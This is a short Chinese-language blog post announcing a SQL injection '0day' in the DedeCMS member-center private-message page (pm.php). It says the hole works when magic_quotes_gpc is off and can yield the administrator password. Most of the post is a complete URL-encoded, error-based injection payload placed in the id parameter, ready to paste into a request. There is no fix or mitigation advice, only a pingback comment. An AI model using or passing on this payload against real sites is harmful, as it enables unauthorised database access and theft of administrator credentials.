DedeCMS会员中心短消息SQL注射0day漏洞

发布日期:2012-12-30
发布作者:c4rp3nt3r

漏洞类型:SQL注入

漏洞描述:需要:magic_quotes_gpc = Off

DedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码等

看到微博上有人提了下,偶也发鸡肋了.

[php]http://www.0day5.com/member/pm.php?dopost=read&id=1%27%20and%20@%60%27%60%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27[/php]

 

1 条评论

  1. DedeCMS会员中心短消息SQL注射0day漏洞 | 黑客之家

    [...] 看到微博上有人提了下,偶也发鸡肋了. ? [...]

发表评论